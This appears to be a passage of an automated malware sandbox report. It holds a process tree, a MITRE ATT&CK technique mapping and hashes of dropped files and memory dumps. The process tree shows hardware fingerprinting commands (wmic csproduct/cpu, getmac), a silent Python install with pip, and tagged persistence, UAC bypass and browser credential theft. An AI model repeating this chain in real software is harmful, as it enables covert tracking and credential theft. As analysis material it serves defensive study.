
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
2⤵
PID:2676

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
3⤵
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
2⤵
PID:4340

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
3⤵
PID:4192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
2⤵
PID:2544

C:\Windows\system32\getmac.exe
getmac /NH
3⤵
PID:4624

C:\Users\Admin\AppData\Local\Temp\python-installer.exe
C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4272

C:\Windows\Temp\{FB429C06-B31A-4859-869C-05AEF6A72FA3}\.cr\python-installer.exe
"C:\Windows\Temp\{FB429C06-B31A-4859-869C-05AEF6A72FA3}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=688 -burn.filehandle.self=536 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
2⤵
PID:3700

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57e2b2.rbs

Filesize
8KB

MD5
e81a795fb06443cf98c84f4130aa1f3d

SHA1
abba890a78559d9b9ad5b12c8bd62bafdda1bfae

SHA256
3f4222446b3f730112f4175fc39bc0a98b3cf496ee98ff3f5fc8adc076448d3b

SHA512
d7f5239f98d73cf5edc8234e6477eea8f16cc3c111edcf6e90638a7c0aad52bc93ebb73b090f128308f9d2f3c6dbd6a1f8d395f099066b466ba51e828c970282

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
38e01d05f1a3c204a4b66f6503a154b4

SHA1
1f13df998e49ba099b8142117047ca78c7728826

SHA256
098383f853295ab4ca31292fc72f149c4d737544f973232a84f48ba060076610

SHA512
d4cf12cc636128328bca08bfefdb5cbd3d7e3fa0b9ab8de99734a9af67c18224146000e2a5b79ad3fcfbcef27290e93fcd8f9c0979c8dd95e47e123b479cbed5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e86a2f4d6dec82df96431112380a87e6

SHA1
2dc61fae82770528bee4fe5733a8ac3396012e79

SHA256
dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

SHA512
5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1f19702290b95461c133a05645a5e604

SHA1
978d8549e99aaf29017a84323e4f3186d86f411e

SHA256
166d74fb24c2f21dc8352a52957f886953f2d501e53a93cbbd90c51649e9cbc9

SHA512
e9d1b29e3e7f87c3a92035e2848c82f1e8b474a77450ea58633cf7ed3b14e59b03d39fa7a0e78a7e7787597b9db93e603c117a0b1d2d92c092d410e4d84ce2f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
51713c102e4f39340aa18ceb188a0806

SHA1
d3683aa7aea70971e22a8af155f64c79555276d6

SHA256
63f2f466ae5e98a5f98925e36f64f58f1531cb47d86a21589258d91e547faaa3

SHA512
dec7cc34ccb7d4d997704ed4b7ec984f1f072a6569abc23a17347a17fdc5c0187c05cc319d1804203c7399906ec592d92857a6c7b6c4bbb4b33141a07ab56c04

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe

Filesize
7.1MB

MD5
f6ddadd0d817ce569e202e57863ae919

SHA1
3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2

SHA256
63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1

SHA512
7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe

Filesize
3.4MB

MD5
fd7e13f2c36fe528afc7a05892b34695

SHA1
14a9c4dfd12e1f9b1e64e110166500be1ef0abb1

SHA256
2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0

SHA512
7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi

Filesize
1.9MB

MD5
d4c1f834f30032f220409a17e0f688cd

SHA1
61dc90b164c3797456a8ed775b353a087054fd0f

SHA256
675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12

SHA512
b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f

Download Submit
C:\Users\Admin\AppData\Local\Temp\KKfb1a3bZl.ps1

Filesize
380B

MD5
cbb9a56c9c8d7c3494b508934ace0b98

SHA1
e76539db673cc1751864166494d4d3d1761cb117

SHA256
027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5

SHA512
f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241101164258_000_core_JustForMe.log

Filesize
3KB

MD5
9592939afe796833cf89b46b58fe72fe

SHA1
7d8fb542fb337bd1371739d3fd465118356d4598

SHA256
81b382ab1176c74e5540a76637228c9c690439ba5c36622c2bec4bb077829b26

SHA512
0e5da7f84c29d1999c6e4072d90401b755cbb7fc827f2bd09c8107dc4374c100fc569b18389759c632ae94b78bec938183ecf648f266b1b483300d8908f61067

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBCB8.tmp

Filesize
1KB

MD5
a4fb5aeba75a7fe11a6588f8c3009c85

SHA1
f464cfa25a1fb83fbce535b104006e051a888d44

SHA256
7e30f5b9be4541f25de6c9b522ef38717f6b4680363b43644c06f86b3c9ca25b

SHA512
e0340755dd4e03cb7ea6c086ce8e6181c5bf1c341f53347b9e7fbe5ffbfcf5d4758162ccb2e38bf0aff3b551a7313793d70ef8b5e567ce500c5a3c6b3066f674

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eyijiwwu.e0j.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ll5aphoi\ll5aphoi.dll

Filesize
3KB

MD5
e47f17bf425ba8796499923084feebf9

SHA1
b09fff75492bf1d853e3cd5a37a115a965356919

SHA256
0d6109126d728e41aabac672055bc47bedf4eaeaf7361f51775bf9c13cfa9927

SHA512
154045644795cd5e62917a7e523886e457c363231afa766a4d6a9eed93027a01026ecfdadac893061aa32064664c8e312a7417b81fc4805a9cd86dd25bfb3589

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\python-installer.exe

Filesize
25.3MB

MD5
d8548aa7609a762ba66f62eeb2ca862d

SHA1
2eb85b73cab52693d3a27446b7de1c300cc05655

SHA256
5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a

SHA512
37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c

Download Submit
C:\Windows\Temp\{76897981-B696-4C73-885A-584CBA74374A}\.ba\PythonBA.dll

Filesize
675KB

MD5
8c8e5a5ca0483abdc6ad6ef22c73b5d2

SHA1
9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc

SHA256
edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43

SHA512
861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157

Download Submit
C:\Windows\Temp\{76897981-B696-4C73-885A-584CBA74374A}\.ba\SideBar.png

Filesize
50KB

MD5
888eb713a0095756252058c9727e088a

SHA1
c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

SHA256
79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

SHA512
7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

Download Submit
C:\Windows\Temp\{76897981-B696-4C73-885A-584CBA74374A}\pip_JustForMe

Filesize
268KB

MD5
494f112096b61cb01810df0e419fb93c

SHA1
295c32c8e1654810c4807e42ba2438c8da39756a

SHA256
2a1f085a0ad75d5b332fb0fe9e1a40146c311e8e524e898a09ca40157619fa80

SHA512
9c8ec8fcc5d74b5022cd170677b62dfedbc187fde1dd296bdb9733bec03e18674a385928c8827a4ce1864433d50e8598228a6d2198aef2937c0dcc0d8f4ea704

Download Submit
C:\Windows\Temp\{FB429C06-B31A-4859-869C-05AEF6A72FA3}\.cr\python-installer.exe

Filesize
858KB

MD5
931227a65a32cebf1c10a99655ad7bbd

SHA1
1b874fdef892a2af2501e1aaea3fcafb4b4b00c6

SHA256
1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d

SHA512
0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ll5aphoi\CSC5F3511AE212C422B8D83FC9EA7B91.TMP

Filesize
652B

MD5
19a53f8b9085eef1e31b3ddab56ac56c

SHA1
185c3ba9175a2fc02209f8cac934ff35a1da8e83

SHA256
aff9cbd77e28a8d275708690bba223e96cb7b9d4814013707fca51d9d061e31d

SHA512
7990dba68fd67da28561dd9b2c160ad67beca4cbd24db6251a505f75251328ef4c7ff2547ac3cae9b6c88d68ec7db793e83bc48a43b98c2e43a0f05eb4929688

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ll5aphoi\ll5aphoi.0.cs

Filesize
312B

MD5
ecbf151f81ff98f7dff196304a40239e

SHA1
ccf6b97b6f8276656b042d64f0595963fe9ec79c

SHA256
295ca195631c485c876e7c468ddcbb3fe7cd219d3e5005a2441be2de54e62ac8

SHA512
4526a59055a18af6c0c13fb9f55a9a9bc15aa1407b697849e19b6cc32c88ee7206b3efff806bd154d36bce144ae1d9c407c6ea0f5077c54fbe92cd172c203720

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ll5aphoi\ll5aphoi.cmdline

Filesize
369B

MD5
682493d68df49f8bd3e5933546f2fa84

SHA1
bd755fb4aa316e3f1e2a4f3e56f299e70aa4f1e0

SHA256
48ef3ab77becdec0fd2c7b01db3ff06405ffa671c363941815f8500424b57fb7

SHA512
9ef43d0431c2a2d2820d9398efc52264202bb4b20bacc1f6723a0c9fbe859a9c7e283d96d5de1dbf08b10ac76a224f5775255980dbe61439e2ae7001fa516b25

Download Submit
memory/1680-116-0x000002A92BB20000-0x000002A92BB70000-memory.dmp

Filesize
320KB

Download
memory/2536-103-0x00007FFD7F200000-0x00007FFD7FCC1000-memory.dmp

Filesize
10.8MB

Download
memory/2536-99-0x0000023852D60000-0x0000023852D68000-memory.dmp

Filesize
32KB

Download
memory/2536-85-0x00007FFD7F200000-0x00007FFD7FCC1000-memory.dmp

Filesize
10.8MB

Download
memory/2536-84-0x00007FFD7F200000-0x00007FFD7FCC1000-memory.dmp

Filesize
10.8MB

Download
memory/2536-75-0x000002383A950000-0x000002383A972000-memory.dmp

Filesize
136KB

Download
memory/2536-73-0x00007FFD7F203000-0x00007FFD7F205000-memory.dmp

Filesize
8KB

Download